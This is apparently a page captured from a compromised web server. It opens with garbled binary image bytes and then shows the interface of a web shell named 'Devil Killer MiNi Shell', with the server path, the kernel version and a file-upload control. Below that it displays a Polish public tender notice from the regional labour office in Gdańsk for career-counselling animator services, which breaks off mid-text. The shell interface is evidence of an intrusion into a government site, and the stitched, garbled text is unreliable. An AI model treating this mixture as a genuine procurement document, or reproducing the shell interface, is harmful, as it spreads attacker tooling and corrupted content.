JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240507/0031298001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług Animatora doradztwa zawodowego w Projekcie Samorządu Województwa Pomorskiego, realizowane w trzech częściach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wojewódzki Urząd Pracy w Gdańsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192035191</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Podwale Przedmiejskie</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-824</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 326 18 01</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wup.gdansk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wupgdansk.praca.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług Animatora doradztwa zawodowego w Projekcie Samorządu Województwa Pomorskiego, realizowane w trzech częściach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c91b7097-0871-11ef-bfd2-32fa350b5bfc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00312980</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00047281/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Usługi animatorów doradztwa zawodowego w subregionie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt Samorządu Województwa Pomorskiego pn. „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych” współfinansowany ze środków Unii Europejskiej Krajowego Planu Odbudowy i Zwiększania Odporności (KPO) </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c91b7097-0871-11ef-bfd2-32fa350b5bfc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin korzystania z Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl<br/>oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje<br/>dotyczące specyfikacji połączenia określa Regulamin korzystania z Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest:<br/>•	Wojewódzki Urząd Pracy w Gdańsku (WUP) z siedzibą: ul. Podwale Przedmiejskie 30, 80-824 Gdańsk; www.wupgdansk.praca.gov.pl<br/>e-mail: wup@wup.gdansk.pl; tel. (58) 326-18-01; fax: (58) 326-48-94<br/>Z Inspektorem Ochrony Danych może się Pani/Pan kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z ich przetwarzaniem na mocy RODO poprzez adres e-mail: iod@wup.gdansk.pl lub kierując korespondencję na adres administratora.<br/>Pani/Pana dane osobowe będą przetwarzane w celu:<br/>•	udziału w przedmiotowym postępowaniu o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, zawarcia i wykonania umowy, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji.<br/>Podstawa prawna:<br/>•	art. 6 ust. 1 lit. c) RODO – przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na WUP określonego w przepisach prawa w związku z ustawą z dnia 11.09.2019r. Prawo zamówień publicznych (dalej jako „ustawa Pzp”), ustawą z dnia 23.04.2009r. o finansach publicznych, ustawą z dnia 06.09.2001r. o dostępie do informacji publicznej oraz ustawą z dnia 14.07.1983r. o narodowym zasobie archiwalnym i archiwach,<br/>•	art. 6 ust. 1 lit. b) RODO – przetwarzanie jest niezbędne do wykonania umowy lub do podjęcia działań przed jej zawarciem.<br/>Odbiorcy Pani/Pana danych osobowych:<br/>•	osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 i 74 ustawy z dnia 11.09.2019r. Prawo zamówień publicznych oraz w zakresie stanowiącym informację publiczną, dane będą ujawnione każdemu zainteresowanemu taką informacją, zgodnie z treścią ustawy z dnia 06.09.2001r. o dostępie do informacji publicznej,<br/>•	podmioty upoważnione przez administratora np. dostawcy usług pocztowych, kurierskich, informatycznych, organy kontrolne oraz innym podmiotom uprawnionym do ich odbioru zgodnie z przepisami prawa.<br/>Pani/Pana dane osobowe będą przechowywane:<br/>•	przez okres prowadzenia postępowania o udzielenie zamówienia publicznego, czas realizacji umowy, a następnie zgodnie z przepisami ustawy z dnia 14.07.1983r. o narodowym zasobie archiwalnym i archiwach – tj. przez okres 10 lat,<br/>•	w przypadku zamówień współfinansowanych ze środków UE lub z innych źródeł, okresy przechowywania dokumentacji wynikają dodatkowo z odpowiednich rozporządzeń/wytycznych/instrukcji dot. realizacji poszczególnych programów.<br/>Przysługuje Pani/Panu prawo:<br/>•	dostępu do swoich danych osobowych na podstawie art. 15 RODO,<br/>•	prawo żądania sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, przy czym skorzystanie z tego prawa nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników,<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Przysługuje Pani/Panu prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych na adres ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych narusza przepisy RODO.<br/>Nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo usunięcia danych osobowych,<br/>•	prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych art. 6 ust. 1 c) RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OZP/332/77-4/AS/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 588000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I przedmiotu zamówienia - Świadczenie usług Animatora doradztwa zawodowego w subregionie metropolitalnym<br/>północnym województwa pomorskiego obejmującym powiaty: pucki, wejherowski, m. Gdynia i m. Sopot oraz prace nad<br/>produktami tworzonymi w Projekcie.<br/>Przedmiot zamówienia dla części I obejmuje następujące działania:<br/>a) Narzędzie dla mieszkańców Pomorza:<br/>- Udział w pracach warsztatowej Grupy interdyscyplinarnej ds. opracowania Narzędzia dla mieszkańców Pomorza - min. 4<br/>spotkania w trakcie trwania Projektu, w tym:<br/>• min. 3 spotkania w celu wypracowania wkładu merytorycznego do Narzędzia,<br/>• min. 1 spotkanie obejmujące testowanie prototypu Narzędzia.<br/>- Testowanie wstępnej wersji Narzędzia dla mieszkańców Pomorza (min. 20 osób).<br/>- Prezentacja doradcom zawodowym subregionu metropolitalnego północnego:<br/>• Scenariusza zajęć dla doradców zawodowych z obszaru Kompetencji przyszłości,<br/>• Scenariusza zajęć dla doradców zawodowych z obszaru Branż rozwojowych.<br/>b) Narzędzie dla pracodawców:<br/>- Współpraca z firmą wyłonioną do opracowania prototypu Narzędzia dla pracodawców:<br/>• Udział w spotkaniach w ramach analizy potrzeb pracodawców w zakresie poradnictwa zawodowego prowadzonej przez<br/>wyłonioną firmę,<br/>• Udział w pracach dot. merytorycznego przygotowania warsztatów Grupy interdyscyplinarnej ds. opracowania Narzędzia<br/>dla pracodawców z obszaru reskillingu i upskillingu,<br/>• Udział we wszystkich spotkaniach warsztatowej Grupy interdyscyplinarnej ds. opracowania Narzędzia dla pracodawców –<br/>min. 40 h pracy warsztatowej w czasie trwania Projektu,<br/>• Monitorowanie procesu tworzenia Narzędzia przez wyłonioną firmę, w tym korekty merytoryczne produktu,<br/>• Rekrutacja pracodawców (min. 10) wg ustalonych kryteriów i testowanie wśród nich (oraz wśród 15 pracodawców<br/>zrekrutowanych przez pozostałych Animatorów) cyfrowego Narzędzia stworzonego przez wyłonioną firmę,<br/>• Stworzenie raportów z testowania ww. Narzędzia wśród pracodawców<br/>z rekomendacjami koniecznych zmian,<br/>• Udział w spotkaniu podsumowującym wyniki testowania ww. Narzędzia.<br/>- Zaprojektowanie formuły wydarzeń upowszechniających wiedzę o Branżach rozwojowych i umiejętnościach niezbędnych<br/>do pracy w tych branżach.<br/>- Organizacja:<br/>• pierwszego wydarzenia przy współpracy z Zespołem projektowym,<br/>• drugiego wydarzenia przy współpracy z Zespołem projektowym.<br/>- Zaprojektowanie formuły i organizacja wydarzenia upowszechniającego Narzędzia wypracowane<br/>w ramach Projektu.<br/>- Opracowanie materiału promującego/prezentującego Narzędzie dla pracodawców.<br/>- Przedstawienie na spotkaniach PSPZ materiału promującego/prezentującego Narzędzie dla pracodawców.<br/>- Upowszechnianie Narzędzia podczas spotkań informacyjno-edukacyjnych i wydarzeń<br/>dla pracodawców - min. 4 spotkania.<br/>c) Mapa:<br/>- Nawiązanie kontaktu i współpraca z doradcami zawodowymi z podmiotów działających w subregionie metropolitalnym<br/>północnym w obszarze poradnictwa zawodowego/uczenia się przez całe życie oraz zaangażowanie ich do przekazywania<br/>informacji do Mapy.<br/>- Przygotowywanie i przekazywanie Zespołowi projektowemu oraz Animatorowi subregionu<br/>słupsko-chojnickiego informacji do Mapy z subregionu metropolitalnego północnego oraz ich aktualizacja.<br/>d) Hub wiedzy<br/>- Przygotowywanie i przekazywanie Zespołowi projektowemu oraz Animatorowi subregionu nadwiślańskiego wiedzy o<br/>pracodawcach z Branż rozwojowych z subregionu metropolitalnego północnego.<br/>e) Działalność Pomorskiego Systemu Poradnictwa Zawodowego<br/>- Rozwijanie sieci PSPZ, tj. rekrutacja nowych członków, w tym doradców zawodowych, doradców kariery, specjalistów ds.<br/>HR, przedsiębiorczości, szkoleń i coachingu.<br/>- Nawiązywanie i utrzymywanie kontaktów z pracodawcami w celu pozyskiwania wiedzy o potrzebach kompetencyjnych<br/>przedsiębiorstw z Branż rozwojowych.<br/>- Bieżąca współpraca z Zespołem projektowym, w tym udział w kwartalnych spotkaniach Zespołu w siedzibie<br/>Zamawiającego i w spotkaniach online wg potrzeb.<br/>- Organizacja spotkań doradców zawodowych w subregionie metropolitalnym północnym, z udziałem ekspertów oraz<br/>pracodawców i innych środowisk, w celu podnoszenia jakości i adaptacyjności świadczonych przez nich usług zgodnie z<br/>harmonogramem Projektu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 186000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312320-8 - Usługi doradztwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone. Oferty będą oceniane metodą punktową w skali 100-punktowej, przy czym 1 % = 1 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w realizacji projektów w zakresie rozwoju zawodowego i/lub aktywizacji zawodowej osoby wskazanej przez Wykonawcę (P)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Animacja/koordynacja działań w obszarze budowania relacji społeczności/grup (A)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Próba wiedzy osoby wskazanej przez Wykonawcę do realizacji przedmiotu zamówienia w obszarze doradztwa zawodowego (W)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II przedmiotu zamówienia - Świadczenie usług Animatora doradztwa zawodowego w subregionie nadwiślańskim<br/>województwa pomorskiego obejmującym powiaty: kwidzyński, malborski, starogardzki, sztumski i tczewski oraz prace nad<br/>produktami tworzonymi w Projekcie.<br/>Przedmiot zamówienia dla części II obejmuje następujące działania:<br/>a) Narzędzie dla mieszkańców Pomorza:<br/>- Udział w pracach warsztatowej Grupy interdyscyplinarnej ds. opracowania Narzędzia dla mieszkańców Pomorza - min. 4<br/>spotkania w trakcie trwania Projektu, w tym:<br/>• min.3 spotkania w celu wypracowania wkładu merytorycznego do Narzędzia,<br/>• min.1 spotkanie obejmujące testowanie prototypu Narzędzia.<br/>- Testowanie wstępnej wersji Narzędzia dla mieszkańców Pomorza (min. 20 osób).<br/>- Prezentacja doradcom zawodowym subregionu nadwiślańskiego:<br/>• Scenariusza zajęć dla doradców zawodowych z obszaru Kompetencji przyszłości,<br/>• Scenariusza zajęć dla doradców zawodowych z obszaru Branż rozwojowych.<br/>b) Narzędzie dla pracodawców:<br/>- Rekrutacja 5 pracodawców wg ustalonych kryteriów i przekazanie kontaktów Animatorowi metropolitalnemu północnemu,<br/>który przetestuje wśród nich Narzędzie cyfrowe stworzone przez wyłonioną firmę.<br/>- Upowszechnianie Narzędzia dla pracodawców podczas spotkań informacyjno-edukacyjnych i wydarzeń dla pracodawców -<br/>min. 4 spotkania.<br/>c) Mapa:<br/>- Nawiązanie kontaktu i współpraca z doradcami zawodowymi z podmiotów działających w subregionie nadwiślańskim w<br/>obszarze poradnictwa zawodowego/uczenia się przez całe życie oraz zaangażowanie ich do przekazywania informacji do<br/>Mapy.<br/>- Przygotowywanie i przekazywanie Zespołowi projektowemu oraz Animatorowi subregionu słupsko-chojnickiego informacji<br/>do Mapy z subregionu nadwiślańskiego oraz ich aktualizacja.<br/>d) Hub wiedzy:<br/>- Opracowanie założeń funkcjonowania Hubu wiedzy (zawartość, forma itd.) z zakresu Branż rozwojowych w regionie,<br/>pracodawców z tych branż, zmian, trendów i tendencji na rynku pracy w tych branżach.<br/>- Wypracowanie we współpracy z innymi doradcami PSPZ i Animatorami źródeł informacji do Hubu wiedzy.<br/>- Opracowanie zawartości Hubu wiedzy z zakresu Branż rozwojowych i trendów na rynku pracy w tych branżach.<br/>- Pozyskiwanie informacji do Hubu wiedzy o pracodawcach z Branż rozwojowych w subregionie nadwiślańskim i od<br/>pozostałych Animatorów, aktualizacji Hubu wiedzy i ujednolicanie zasobów<br/>- Przygotowanie założeń upowszechniania Hubu wiedzy wśród mieszkańców Pomorza.<br/>- Zaprezentowanie Hubu wiedzy na wydarzeniach, tj. targach, dniach kariery, konferencjach i in. w każdym subregionie woj.<br/>pomorskiego.<br/>e) Działalność Pomorskiego Systemu Poradnictwa Zawodowego:<br/>- Rozwijanie sieci PSPZ, tj. rekrutacja nowych członków, w tym doradców zawodowych, doradców kariery, specjalistów ds.<br/>HR, przedsiębiorczości, szkoleń i coachingu.<br/>- Nawiązywanie i utrzymywanie kontaktów z pracodawcami w celu pozyskiwania wiedzy o potrzebach kompetencyjnych<br/>przedsiębiorstw z Branż rozwojowych.<br/>- Bieżąca współpraca z Zespołem projektowym, w tym udział w kwartalnych spotkaniach Zespołu w siedzibie<br/>Zamawiającego i w spotkaniach online wg potrzeb.<br/>- Organizacja 